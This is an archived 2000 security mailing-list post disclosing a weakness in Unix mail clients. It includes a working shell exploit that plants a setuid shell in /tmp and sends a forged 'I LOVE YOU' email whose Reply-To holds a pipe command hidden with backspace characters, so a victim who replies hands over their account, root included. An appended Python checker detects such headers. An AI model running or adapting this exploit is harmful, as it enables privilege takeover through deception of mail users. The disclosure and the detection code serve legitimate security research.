mail Reply-To field exploit
From: gregory duchemin <c3rb3r () HOTMAIL COM>
Date: Sun, 5 Nov 2000 21:56:17 GMT
Because there are a few people here that didn't seem to understand how
serious the mail.local/mail/sendmail weakness I reported to bugtraq a
few days ago is (lack of imagination?),
here is an exploit, not technically impressive but just powerful enough to
deceive many people around here and take over their account privilege.
I persist in claiming that no | char should be allowed in any smtp/lmtp/mime
(even in contradiction with any RFC) because of the major security
vulnerability it introduces.
Note: It's NOT A BUG in mail, sendmail or mail.local but a weakness caused
by a bindly
I didn't try elm, mailx and others, so feedback is welcome.
Payback here is victim account takeover by spawning a setuid shell
in /tmp (even root).
Solution: take care about the Reply-To recipient's real anatomy. :)
I LOVE YOU letter for Unix
# Exploit for | char in mail Reply-To field
# tested on linux Caldera (techno preview linux 2.4.0)
# Gregory Duchemin ( AKA C3rb3r )
# Security Consultant
# NEUROCOM CANADA
# 1001 bd Maisonneuve Ouest
# Montreal (Quebec) H3A 3C8 Canada
# c3rb3r () hotmail com
# Cook Ingredients: one | char (hidden in an uppercase i),
# a bit of evil ^H to hide "/tmp/", and a girl to stimulate a reply ;)
cat ^H^H^H^H^Hsabelle () hotmail com << _End
cp /bin/sh /tmp/newsh
chmod a+rws /tmp/newsh
echo "HELO hotmail.com"
echo "MAIL FROM:<Isabelle () hotmail com>"
echo "RCPT TO:<root>"
# Reply-to will appear as Reply-To:<|sabelle () hotmail com>
echo "Reply-To:<|/tmp/^H^H^H^H^Hsabelle () hotmail com>"
echo "I saw you yesterday, since i'm a bit confused..i just wanted"
echo "to say you."
echo "I believe I LOVE YOU"
}|telnet localhost 25
echo "Job is done...now check for newsh in /tmp"
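As an added example (not part of the original post): a small Python checker that parses a message's address headers and flags the two tricks the exploit above relies on, a leading | in the reply address and backspace characters that make the address shown on a terminal differ from the real one. The sample message is constructed with example.com addresses; the header names and thresholds are my assumptions, not anything from the post.

```python
import re

# Headers a reply command takes its recipient from; a 2000-era "mail"
# preferred Reply-To, which is the one the post abuses.
ADDRESS_HEADERS = ("reply-to", "from", "sender", "return-path")
PIPE_RE = re.compile(r"^\s*<?\s*\|")                   # "|cmd" or "<|cmd>"
CONTROL_RE = re.compile(r"[\x00-\x08\x0b-\x1f\x7f]")  # BS, ESC, NUL ... (not TAB/LF)

def parse_headers(raw: str) -> list[tuple[str, str]]:
    """Split off the header block and unfold RFC 822 continuation lines."""
    head = raw.split("\n\n", 1)[0]
    headers: list[tuple[str, str]] = []
    for line in head.splitlines():
        if line[:1] in (" ", "\t") and headers:        # folded continuation
            name, value = headers[-1]
            headers[-1] = (name, value + " " + line.strip())
        elif ":" in line:
            name, value = line.split(":", 1)
            headers.append((name.strip().lower(), value.strip()))
    return headers

def render_as_terminal(s: str) -> str:
    """What a user sees on a terminal: each backspace erases the previous char."""
    out: list[str] = []
    for ch in s:
        if ch == "\b":
            if out:
                out.pop()
        else:
            out.append(ch)
    return "".join(out)

def check_address_headers(raw: str) -> list[dict]:
    """One finding per address header that would be piped or displayed misleadingly."""
    findings = []
    for name, value in parse_headers(raw):
        if name not in ADDRESS_HEADERS:
            continue
        reasons = []
        if PIPE_RE.match(value):
            reasons.append("leading '|': a reply would be piped to a command")
        if CONTROL_RE.search(value):
            reasons.append("control characters: displayed address differs from real one")
        if reasons:
            findings.append({"header": name, "raw": value,
                             "displayed": render_as_terminal(value), "reasons": reasons})
    return findings

# Constructed sample in the shape of the post's message (example.com, not a real address).
SAMPLE = ("From: Isabelle <isabelle@example.com>\n"
          "Reply-To:<|/tmp/\b\b\b\b\bsabelle@example.com>\n"
          "Subject: I LOVE YOU\n\nI believe I LOVE YOU\n")
```

Running `check_address_headers(SAMPLE)` reports the Reply-To header as displayed `<|sabelle@example.com>` but really `<|/tmp/...sabelle@example.com>`, with both reasons attached.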